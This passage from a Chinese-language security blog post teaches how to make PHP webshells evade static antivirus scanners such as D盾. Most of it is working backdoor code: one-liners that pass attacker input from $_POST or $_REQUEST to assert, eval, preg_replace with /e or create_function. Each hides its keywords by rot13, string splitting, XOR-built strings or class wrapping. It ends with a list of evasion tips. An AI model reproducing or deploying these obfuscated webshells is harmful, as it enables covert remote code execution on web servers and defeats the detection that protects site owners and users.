<p>但是这样还是绕不过D盾，那就在函数的外面再套上类来试试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class One&#123;</span><br><span class="line">function test($x)&#123;</span><br><span class="line">$c=str_rot13(&#x27;n!ff!re!nffreg&#x27;);</span><br><span class="line">$str=explode(&#x27;!&#x27;,$c)[3];</span><br><span class="line">$str($x);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">$test=new One();</span><br><span class="line">$test-&gt;test($_REQUEST[&#x27;x&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>利用explode函数来分割字符串，再由class封装类来进行绕过D盾<br>拆解合并</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$ch = explode(&quot;.&quot;,&quot;hello.ass.world.er.t&quot;);</span><br><span class="line">$c = $ch[1].$ch[3].$ch[4]; //assert</span><br><span class="line">$c($_POST[&#x27;x&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p> 还有很多加解密方式，利用各种函数如array_map、array_key、preg_replace来隐藏关键字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">随机异或产生</span><br></pre></td></tr></table></figure>
<p><code>&quot;Y&quot;^&quot;\x38&quot;</code>的结果就是a，同样的生成assert即可 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$_StL=&quot;Y&quot;^&quot;\x38&quot;;</span><br><span class="line">$_ENr=&quot;T&quot;^&quot;\x27&quot;;</span><br><span class="line">$_ohw=&quot;^&quot;^&quot;\x2d&quot;;</span><br><span class="line">$_gpN=&quot;~&quot;^&quot;\x1b&quot;;</span><br><span class="line">$_fyR=&quot;g&quot;^&quot;\x15&quot;;</span><br><span class="line">$_pAs=&quot;H&quot;^&quot;\x3c&quot;;</span><br><span class="line"></span><br><span class="line">$c=$_StL.$_ENr.$_ohw.$_gpN.$_fyR.$_pAs;</span><br></pre></td></tr></table></figure>
<p> 上面讲了三种隐藏关键字的方式，作用大同小异<br><strong>特殊字符干扰</strong></p>
<p>特殊字符干扰，要求是能干扰到杀软的正则判断，还要代码能执行,网上广为流传的连接符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = $_REQUEST[&#x27;a&#x27;];</span><br><span class="line">    $b = null;</span><br><span class="line">    eval($b.$a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>不过已经不能免杀了，利用适当的变形即可免杀 如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = $_POST[&#x27;a&#x27;];</span><br><span class="line">    $b = &quot;\n&quot;;</span><br><span class="line">    eval($b.=$a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>其他方法如”\r\n\t”,函数返回，类，等等<br><strong>利用数组</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = substr_replace(&quot;assexx&quot;,&quot;rt&quot;,4);</span><br><span class="line">    $b=[&#x27;&#x27;=&gt;$a($_POST[&#x27;a&#x27;])];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>利用函数</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function func()&#123;</span><br><span class="line">return $_REQUEST[&#x27;x&#x27;];</span><br><span class="line">&#125;</span><br><span class="line">preg_replace(&quot;/hello/e&quot;,func(),&quot;hello&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>加上/e可以当作PHP代码进行解析，测试在5.6版本下可以使用<br>除此之外，例如create_function函数，用来创建匿名函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">$a = create_function(&#x27;&#x27;,$_POST[&#x27;a&#x27;]);</span><br><span class="line">$a();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><strong>字符特征马</strong><br>对于无特征马这里我的意思是无字符特征</p>
<p>利用异或,编码等方式 例如p神博客的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $_=(&#x27;%01&#x27;^&#x27;`&#x27;).(&#x27;%13&#x27;^&#x27;`&#x27;).(&#x27;%13&#x27;^&#x27;`&#x27;).(&#x27;%05&#x27;^&#x27;`&#x27;).(&#x27;%12&#x27;^&#x27;`&#x27;).(&#x27;%14&#x27;^&#x27;`&#x27;); // </span><br><span class="line">    $_=&#x27;assert&#x27;;</span><br><span class="line">    $__=&#x27;_&#x27;.(&#x27;%0D&#x27;^&#x27;]&#x27;).(&#x27;%2F&#x27;^&#x27;`&#x27;).(&#x27;%0E&#x27;^&#x27;]&#x27;).(&#x27;%09&#x27;^&#x27;]&#x27;); // $__=&#x27;_POST&#x27;;</span><br><span class="line">    $___=$$__;</span><br><span class="line">    $_($___[_]); // assert($_POST[_]);</span><br></pre></td></tr></table></figure>
<p>  到这里静态免杀基本就完了，总结一下：</p>
<ul>
<li>使用冷门函数</li>
<li>尽量避免使用敏感关键字，可以用各种方式生成</li>
<li>将关键代码混淆在类、函数里</li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/29/Java/shiro550(CVE-2016-4437)/" rel="prev" title="shiro550(CVE-2016-4437)">
                  <i class="fa fa-chevron-left"></i> shiro550(CVE-2016-4437)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/07/31/ATT/ATT&CK%20%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%EF%BC%88%E4%B8%80%EF%BC%891/" rel="next" title="ATT&CK 红队实战（一）1">
                  ATT&CK 红队实战（一）1 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">D0gekong</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
